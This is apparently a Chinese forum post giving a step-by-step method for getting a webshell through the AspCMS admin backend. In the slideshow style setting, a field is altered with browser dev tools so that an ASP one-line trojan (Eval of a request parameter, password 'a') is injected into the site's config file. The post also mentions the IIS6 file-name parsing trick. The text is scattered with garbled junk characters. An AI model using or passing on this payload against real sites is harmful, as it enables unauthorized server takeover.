aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.$ e; G& v. o) r# O; |2 P- j
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
( P0 P3 d' ~0 g( P2 a0 t' ~2 H5 E* Y
6 V, B6 h0 ]" g. t( Z$ O- Q
" I1 ^: M# m$ Q' e' T2 o) [; c/ _" e
2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%' n) t3 w( N" U! ` w4 G
- L3 A5 Z. g* Q6 t/ ~
9 ^6 r$ u" d( ^/ D7 j3、一句话木马,密码a。在/config/AspCms_Config.asp
& f, @/ p( |) s
* [, q9 G( g: n( J
$ v! Y z4 K. B. O" ] |